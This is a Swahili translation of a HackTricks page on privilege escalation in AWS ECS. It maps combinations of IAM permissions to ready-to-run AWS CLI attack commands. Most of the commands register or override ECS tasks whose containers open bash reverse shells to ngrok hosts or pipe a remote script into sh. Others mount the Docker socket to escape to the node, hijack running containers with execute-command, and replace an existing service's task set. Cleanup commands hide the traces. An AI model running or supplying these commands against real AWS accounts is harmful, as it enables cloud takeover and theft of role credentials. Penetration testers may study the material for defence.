Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - ECS Privesc

Support HackTricks

ECS

Maelezo zaidi kuhusu ECS katika:

AWS - ECS Enum

iam:PassRole, ecs:RegisterTaskDefinition, ecs:RunTask

Mshambuliaji akitumia vibaya ruhusa za iam:PassRole, ecs:RegisterTaskDefinition na ecs:RunTask katika ECS anaweza kuunda ufafanuzi mpya wa kazi na kontena hasidi ambalo linaiba sifa za metadata na kuendesha.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Potential Impact: Privesc ya moja kwa moja kwa ECS role tofauti.

iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask

Kama ilivyo katika mfano uliopita, mshambuliaji akitumia vibaya ruhusa za iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask katika ECS anaweza kuunda task definition mpya na container mbaya inayovujisha metadata credentials na kuendesha. Hata hivyo, katika kesi hii, container instance ya kuendesha task definition mbaya inahitajika.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

aws ecs start-task --task-definition iam_exfiltration \
--container-instances <instance_id>

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Athari Inayowezekana: Privesc ya moja kwa moja kwa jukumu lolote la ECS.

iam:PassRole, ecs:RegisterTaskDefinition, (ecs:UpdateService|ecs:CreateService)

Kama ilivyo katika mfano uliopita, mshambulizi anayenyanyasa ruhusa za iam:PassRole, ecs:RegisterTaskDefinition, ecs:UpdateService au ecs:CreateService katika ECS anaweza kuzalisha ufafanuzi mpya wa kazi na kontena hasidi ambalo linaiba sifa za metadata na kuendesha kwa kuunda huduma mpya yenye angalau kazi 1 inayoendesha.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn  "$ECS_ROLE_ARN" \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
--task-definition iam_exfiltration \
--desired-count 1 \
--cluster "$CLUSTER_ARN" \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
--service <SERVICE NAME> \
--task-definition <NEW TASK DEFINITION NAME>

Potential Impact: Privesc ya moja kwa moja kwa jukumu lolote la ECS.

iam:PassRole, (ecs:UpdateService|ecs:CreateService)

Kwa kweli, kwa kutumia ruhusa hizo tu inawezekana kutumia overrides kutekeleza amri za kiholela kwenye kontena na jukumu la kiholela kwa kitu kama:

aws ecs run-task \
--task-definition "<task-name>" \
--overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
--cluster <cluster-name> \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"

Potential Impact: Privesc ya moja kwa moja kwa ECS role yoyote.

ecs:RegisterTaskDefinition, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

Hali hii ni kama zile za awali lakini bila ruhusa ya iam:PassRole. Hii bado ni ya kuvutia kwa sababu kama unaweza kuendesha kontena lolote, hata kama ni bila role, unaweza kuendesha kontena yenye ruhusa nyingi ili kutoroka kwenye node na kuiba EC2 IAM role na roles za kontena zingine za ECS zinazoendesha kwenye node. Unaweza hata kulazimisha kazi zingine kuendesha ndani ya EC2 instance unayodhibiti ili kuiba sifa zao (kama ilivyojadiliwa katika Sehemu ya Privesc kwa node).

Shambulio hili linawezekana tu kama ECS cluster inatumia EC2 instances na siyo Fargate.

printf '[
{
"name":"exfil_creds",
"image":"python:latest",
"entryPoint":["sh", "-c"],
"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
"mountPoints": [
{
"readOnly": false,
"containerPath": "/var/run/docker.sock",
"sourceVolume": "docker-socket"
}
]
}
]' > /tmp/task.json

printf '[
{
"name": "docker-socket",
"host": {
"sourcePath": "/var/run/docker.sock"
}
}
]' > /tmp/volumes.json


aws ecs register-task-definition --family iam_exfiltration \
--cpu 256 --memory 512 \
--requires-compatibilities '["EC2"]' \
--container-definitions file:///tmp/task.json \
--volumes file:///tmp/volumes.json


aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
--launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell

ecs:ExecuteCommand, ecs:DescribeTasks,(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

Mshambuliaji mwenye ecs:ExecuteCommand, ecs:DescribeTasks anaweza kuendesha amri ndani ya kontena linaloendelea na kuiba jukumu la IAM lililounganishwa nalo (unahitaji ruhusa za kuelezea kwa sababu ni muhimu kuendesha aws ecs execute-command). Hata hivyo, ili kufanya hivyo, kontena inahitaji kuwa inaendesha ExecuteCommand agent (ambayo kwa default haipo).

Kwa hivyo, mshambuliaji anaweza kujaribu:

  • Jaribu kuendesha amri katika kila kontena linaloendelea

# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
echo "Cluster $cluster"
for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
echo "  Task $task"
# If true, it's your lucky day
aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
done
done

# Execute a shell in a container
aws ecs execute-command --interactive \
--command "sh" \
--cluster "$CLUSTER_ARN" \
--task "$TASK_ARN"

  • Ikiwa ana ecs:RunTask, endesha kazi na aws ecs run-task --enable-execute-command [...]

  • Ikiwa ana ecs:StartTask, endesha kazi na aws ecs start-task --enable-execute-command [...]

  • Ikiwa ana ecs:CreateService, unda huduma na aws ecs create-service --enable-execute-command [...]

  • Ikiwa ana ecs:UpdateService, sasisha huduma na aws ecs update-service --enable-execute-command [...]

Unaweza kupata mifano ya chaguzi hizo katika sehemu za awali za ECS privesc.

Athari Zinawezekana: Privesc kwa jukumu tofauti lililounganishwa na kontena.

ssm:StartSession

Angalia katika ukurasa wa ssm privesc jinsi unavyoweza kutumia ruhusa hii kwa privesc kwa ECS:

AWS - SSM Privesc

iam:PassRole, ec2:RunInstances

Angalia katika ukurasa wa ec2 privesc jinsi unavyoweza kutumia ruhusa hizi kwa privesc kwa ECS:

AWS - EC2 Privesc

?ecs:RegisterContainerInstance

TODO: Je, inawezekana kusajili mfano kutoka akaunti tofauti ya AWS ili kazi ziendeshwe chini ya mashine zinazosimamiwa na mshambuliaji??

ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, ecs:DescribeTaskSets

TODO: Jaribu hii

Mshambuliaji mwenye ruhusa za ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, na ecs:DescribeTaskSets anaweza kuunda seti ya kazi mbaya kwa huduma iliyopo ya ECS na kusasisha seti ya kazi ya msingi. Hii inamruhusu mshambuliaji kutekeleza msimbo wowote ndani ya huduma.

bashCopy code# Register a task definition with a reverse shell
echo '{
"family": "malicious-task",
"containerDefinitions": [
{
"name": "malicious-container",
"image": "alpine",
"command": [
"sh",
"-c",
"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
]
}
]
}' > malicious-task-definition.json

aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id

Athari Zinazowezekana: Tekeleza msimbo wa kiholela katika huduma iliyoathiriwa, ambayo inaweza kuathiri utendaji wake au kutoa data nyeti.

Marejeleo

Support HackTricks
PreviousAWS - ECR PrivescNextAWS - EFS Privesc

Last updated